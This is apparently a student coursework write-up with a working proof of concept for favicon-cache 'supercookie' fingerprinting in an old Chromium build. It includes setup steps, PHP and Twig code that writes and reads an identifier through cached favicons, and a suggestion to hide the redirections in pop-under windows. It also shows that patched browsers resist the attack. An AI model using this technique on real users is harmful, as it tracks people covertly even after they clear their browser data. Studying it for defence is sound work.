# Supercookie
Petr Hoffmann, 963810

I strongly recommend cloning https://gitlab.com/uni.hoffic.cz/cscm28-cw2 rather than using the *.zip submission.

# Overview of the Vulnerability
Favicons are small images displayed near the titles of web pages. These icons are stored in a browser-global cache and
the vulnerable versions of browsers such as Chromium v81.0.4021.0 do not purge this cache when the user requests the
website data to be deleted. This allows an attacker to encode a unique fingerprint using the set of cached favicons.

The set is encoded using a series of redirections, each either loading or not loading the corresponding favicon and thus
encoding true and false bits when the favicon is or isn't present in the cache respectively.

Once encoded, the server can switch to a reading mode where it monitors which favicon requests come from the user and
since the browser will request precisely those that are not stored in the cache, the server can decode the unique
fingerprint from the series of requests for missing favicons.

# Overview of the Setup
To demonstrate this vulnerability, we need a vulnerable version of a web browser such as Chromium v81.0.4021.0. These
can be downloaded from the
[continuous builds archive](https://commondatastorage.googleapis.com/chromium-browser-snapshots/index.html)
and are platform-specific.
Instructions for finding the artifact can be found at the bottom of
[this page](https://www.chromium.org/getting-involved/download-chromium).

The malicious webpage will be served from a local server. In this case it's a PHP/Symfony app packed in a docker-compose
array (see the pre-requisites section).

Finally, for demonstrating the patch for this vulnerability, we'll use a current (as of March 2021) version of Google
Chrome.

# Demonstration of the Exploit
The browser starts at a webpage. A unique fingerprint is either passed from the server or generated randomly.

![](./docs/s1.png)

With the generated key, the browser is routed through a series of redirections that either load the favicon:

![](./docs/s2.png)

or do not load the icon:

![](./docs/s3.png)

This series of redirections can also be performed with a technique called pop-under, where a new window is
open behind the window that the user is interacting with. In that case the user would not notice any redirections.

After the redirections are finished, the fingerprint is encoded in the favicon cache.

![](./docs/s4.png)

Now is the time to switch the server to a reading mode.

![](./docs/s5.png)

The user can now clear cookies, cache and any other web data and proceed back to the starting page.

![](./docs/s6.png)

The server is now in read mode and tracking requests for favicons while returning 404 - Not Found errors.

![](./docs/s7.png)

The favicons that are stored in the cache are loaded from the cache and do not result in a request to the server.
*Note that in read mode, the key in the URL of the redirection pages serves no purpose and is just a new random key.*

![](./docs/s8.png)

From the set of favicon requests to the server it's possible to decode the original fingerprint.

![](./docs/s9.png)

If the browser is vulnerable to this fingerprinting attack, it will display the fingerprint encoded earlier.

# Demonstration of the Patch
If the browser is not vulnerable, the same exact series of action will result in the fingerprint being read as all
zeroes.

![](./docs/s10.png)

This is the case, because the patched browsers either remove the favicons from the cache when clearing webpage data or
make a request to the server despite having a cached version available.

# Run it Yourself

### Pre-requisites

- Docker v20.10+
- Docker Compose v1.27+

Note to windows users: Use something else.

### Setup

- Clone the [project](https://gitlab.com/uni.hoffic.cz/cscm28-cw2) and navigate to the root directory
- `docker-compose up -d`
- `docker-compose exec app ash -c "composer install"`
- `docker-compose exec app ash -c "php bin/console doctrine:schema:update -f"`
- Navigate to [http://localhost:8080/](http://localhost:8080/).

### Performing the Exploit
To perform the exploit and demonstrate the fingerprinting the steps below must be followed precisely and in order.

- Encoding the fingerprint
    - Set the contents of `$PROJECT_ROOT/public/mode.txt` to `write`
    - Refresh the page and observe it says "Mode: Write"
    - Keep refreshing the page until you are happy with the randomly generated key
    - Click "perform redirections" and wait for the message "Bits encoded!"
    - Set the contents of `$PROJECT_ROOT/public/mode.txt` to `read`
    - Refresh the page and observe it says "The server is now in read mode"
    - Follow the link displayed on the page
- Clean the browser's cookies, cache and all other page data
- Decoding the fingerprint
    - Click "perform redirections" and wait for the results
    - If your browser is vulnerable, it will display your fingerprint, otherwise it will display all zeroes.

# The Code
The first piece of code is an endpoint that returns a favicon if the server is in a "write" mode. If the server is in
a "read" mode, the server responds with 404 - Not Found and logs the id of the icon the user requested under the session
id.

[$PROJECT_ROOT/src/Controller/IndexController.php](src/Controller/IndexController.php)
```php
/**
 * @Route(path="/icon/{salt}/{bit}/favicon.png", name="icon")
 * @param string $salt
 * @param int $bit
 * @param SessionInterface $session
 * @param IconRequestRepository $iconRequestRepository
 * @return Response
 */
public function icon(string $salt, int $bit, SessionInterface $session, IconRequestRepository $iconRequestRepository)
{
    if ($this->isReadMode()) {
        $iconRequestRepository->registerHit(
            strval($session->get('Xid')),
            $bit);

        return new Response(null, Response::HTTP_NOT_FOUND);

    } else {
        return new Response(
            readfile('../assets/static/favicon.png'),
            Response::HTTP_OK,
            [
                'Content-Type' => 'image/png',
            ]
        );
    }
}
```

Another endpoint renders the html content that instructs to use the favicons specified and redirect to the next step.

[$PROJECT_ROOT/src/Controller/IndexController.php](src/Controller/IndexController.php)
```php
/**
 * @Route(path="/redirection/{key}/{bit}/", name="redirection")
 * @param string $key
 * @param int $bit
 * @return Response
 */
public function redirection(string $key, int $bit)
{
    return $this->render('redirection.html.twig', [
        'read' => $this->isReadMode(),
        'key' => $key,
        'bit' => $bit,
        'final' => $bit + 1 >= self::BIT_LENGTH,
        'salt' => self::SALT,
    ]);
}
```

The html will include the link to the favicon if the current bit is set in the head block.
The body will then redirect to the next page using javascript.

[$PROJECT_ROOT/templates/redirection.html.twig](templates/redirection.html.twig)
```twig
{% extends 'base.html.twig' %}

{% set bitValue = key | slice(bit, 1) == '1' %}

{% block head %}
    {% if bitValue or read %}
        <link rel="icon" type="image/png" href="{{ path('icon', {'salt': salt, 'bit': bit}) }}"/>
    {% endif %}
{% endblock %}

{% block body %}
    <h1>Mode: {{ read ? 'Read' : 'Write' }}</h1>
    <div>Bit: {{ bit }}</div>
    {% if not read %}
        <div>Key: {{ key }}</div>
        <div>Bit Value: {{ bitValue ? 'true' : 'false' }}</div>
    {% endif %}

    {% if final %}
        {% set address = read ? path('finished-reading') : path('finished-writing') %}
    {% else %}
        {% set address = path('redirection', {'key': key, 'bit': bit + 1}) %}
    {% endif %}

    <script>
        setTimeout(() => {
            window.location.href = '{{ address }}';
        }, 1000);
    </script>
{% endblock %}
```

Finally, from the records of favicon requests, the fingerprint is reconstructed using the code below. This initialises
an array of booleans to true and for all icons that were not in the cache and therefore the browser sent a request to
the server, we set those bits to false. Note that the "X_user" and $user are the session id.

[$PROJECT_ROOT/src/Repository/IconRequestRepository.php](src/Repository/IconRequestRepository.php)
```php
public function readBits($user): string
{
    /** @var IconRequest[] $hits */
    $hits = $this->findBy(['X_user' => $user]);
    $bits = array_fill(0, IndexController::BIT_LENGTH, 1);

    foreach ($hits as $hit) {
        $bits[$hit->getBit()] = 0;
    }

    return implode('', $bits);
}
```
